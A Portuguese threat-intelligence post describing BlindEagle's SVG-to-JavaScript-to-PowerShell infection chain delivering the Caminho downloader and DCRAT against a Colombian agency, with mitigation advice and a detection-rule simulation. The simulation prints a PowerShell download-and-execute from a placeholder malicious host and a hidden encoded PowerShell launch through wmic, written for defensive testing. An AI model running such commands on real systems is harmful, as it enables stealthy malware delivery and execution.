BlindEagle Alvo Agência Governamental Colombiana com Caminho e DCRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
BlindEagle Alvo Agência Governamental Colombiana com Caminho e DCRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

BlindEagle realizou uma operação de spear-phishing mirando uma agência governamental colombiana, entregando um anexo SVG armado que iniciou uma cadeia de execução de JavaScript para PowerShell. Essa sequência baixou um downloader chamado Caminho, que então buscou o trojan de acesso remoto open-source DCRAT hospedado no Discord. A etapa final utilizou o processo hollowing no MSBuild.exe e aplicou múltiplos métodos de evasão para reduzir a detecção.

Investigação

O Zscaler ThreatLabz analisou o fluxo de infecção e relatou uma abordagem de contrabando de SVG, vários níveis de JavaScript ofuscado, um comando PowerShell acionado por WMI, e a entrega do Caminho através de uma URL hospedada no Discord. A investigação também associou a infraestrutura de suporte a endereços IP suecos e um provedor de DNS dinâmico (ydns.eu).

Mitigação

Aplique controles mais rígidos para anexos de email recebidos – especialmente conteúdo SVG – e aplique desarmamento/inspeção de conteúdo para scripts embutidos. Use políticas de proxy web para restringir o acesso a endpoints de hospedagem de arquivos suspeitos, incluindo URLs de arquivo do Discord usadas para entrega de malware. Monitore padrões incomuns de execução de PowerShell e WMI e imponha políticas de lista de permissão de aplicativos cobrindo o uso do MSBuild.exe.

Resposta

Resposta

Acione alertas para o artefato SVG malicioso, o nome de arquivo JavaScript referenciado, e downloads atingindo a URL do Discord. Procure por traços em memória ou em disco do Caminho e DCRAT, evidências de hollowing de processo do MSBuild.exe, e persistência via mudanças no registro ou tarefas agendadas. Quarentena terminais impactados e bloqueie o domínio C2 identificado.

Fluxo de Ataque

Execução da Simulação

Pré-requisito: O Cheque de Pré-voo de Telemetria & Baseline deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar exatamente a telemetria esperada pela lógica de detecção.

  • Narrativa de Ataque & Comandos:
    O ator de ameaça (BlindEagle) usa WMI para gerar um processo PowerShell que baixa o payload “Caminho” de um servidor C2 remoto e o executa em memória. Ao aproveitar wmic.exe com o process call create método, o atacante pode executar o PowerShell sem interagir com uma sessão de usuário, tornando a atividade furtiva. A linha de comando contém a palavra literal “powershell”, que satisfaz a condição da regra de detecção.

    1. Etapa 1 – Prepare o PowerShell malicioso em uma linha:

      $url = "http://malicious.example.com/caminho.exe"
      $out = "$env:TEMPcaminho.exe"
      Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out
    2. Etapa 2 – Execute via WMI:

      $psCmd = 'powershell -nop -w hidden -enc <base64-encoded-payload>'
      wmic process call create "$psCmd"

    A presença de powershell no CommandLine campo do Evento Sysmon 1 gerado pelo processo filho wmic irá acionar a regra.

  • Script de Teste de Regressão:

    # Simulação de PowerShell do BlindEagle via WMI
    # ----------------------------------------------------------------------
    # 1. Definir payload malicioso (para teste usamos um comando de eco benigno)
    $payload = 'Write-Host "Execução simulada do Caminho"'
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Construir a linha de comando do PowerShell que inclui a palavra literal "powershell"
    $psCommand = "powershell -NoProfile -EncodedCommand $encoded"
    
    # 3. Inicie o comando via WMI (wmic) para gerar um Sysmon EventID 1
    $wmicCommand = "wmic process call create `"$psCommand`""
    Write-Host "Executando via WMI: $wmicCommand"
    Invoke-Expression $wmicCommand
    
    # 4. Opcional: Registrar no console para verificação
    Write-Host "Simulação completa. Verifique a detecção no SIEM."
  • Comandos de Limpeza:

    # Remova quaisquer arquivos temporários (nenhum criado nesta simulação)
    # Mate quaisquer processos wmic ou PowerShell remanescentes iniciados para o teste
    Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force
    Write-Host "Limpeza completa."